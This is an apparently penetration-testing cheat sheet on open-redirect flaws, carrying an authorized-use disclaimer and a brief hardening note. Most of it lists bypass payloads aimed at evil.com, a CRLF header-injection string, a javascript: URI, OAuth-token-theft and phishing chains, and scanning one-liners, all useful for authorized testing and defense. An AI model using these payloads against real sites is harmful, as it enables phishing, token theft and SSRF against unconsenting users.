OPEN-REDIRECT
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
An open redirect sends users to an attacker URL via a trusted domain. Low sev alone, but powerful chained (phishing, OAuth token theft, SSRF/WAF bypass, SSO). Authorized testing only.
FIND THE PARAMETERS#
Common names: url= next= dest= destination= redirect= redirect_uri= redir= return= returnTo= returnUrl= continue= goto= out= view= to= image_url= callback= Also path-based: /redirect/https://evil.com , Location set from Referer/Host.
PAYLOADS / FILTER BYPASS#
Baseline: ?next=https://evil.com
Scheme-relative: ?next=//evil.com ///evil.com /%2f/evil.com
Backslash tricks: ?next=https:/\evil.com https:\\evil.com /\/\evil.com
Whitelist bypass: ?next=https://target.com@evil.com (userinfo)
?next=https://evil.com#target.com
?next=https://evil.com?target.com
?next=https://target.com.evil.com (suffix)
?next=https://evil.com/target.com (path)
Encoding: %2f%2fevil.com %68ttps://evil.com double-encode
CRLF chain: ?next=%0d%0aLocation:%20https://evil.com (header injection)
data:/javascript: ?next=javascript:alert(document.domain) (DOM-based only)
DOM-BASED#
Sinks: location = ..., location.href/assign/replace(...), window.open(...). Source often location.hash/search. Payload stays client-side: #https://evil.com or ?url=javascript:...
HIGH-IMPACT CHAINS#
- OAuth/SSO: redirect_uri open redirect -> steal auth code/token. - Phishing: https://trusted.com/redir?url=https://evil-login. - SSRF/WAF bypass: server-side fetch follows the redirect to internal host. - Cookie/CSP bypass via trusted-origin hop.
TOOLING#
Burp + Intruder with an open-redirect payload list (seclists). Automation: oralyzer, OpenRedireX, or nuclei open-redirect templates: nuclei -t http/exposures -tags redirect -l urls.txt cat urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -location
HARDENING (blue-team note)#
Use server-side allowlists of relative paths/known hosts, avoid taking full URLs from user input, and if you must, validate scheme+host against an exact allowlist.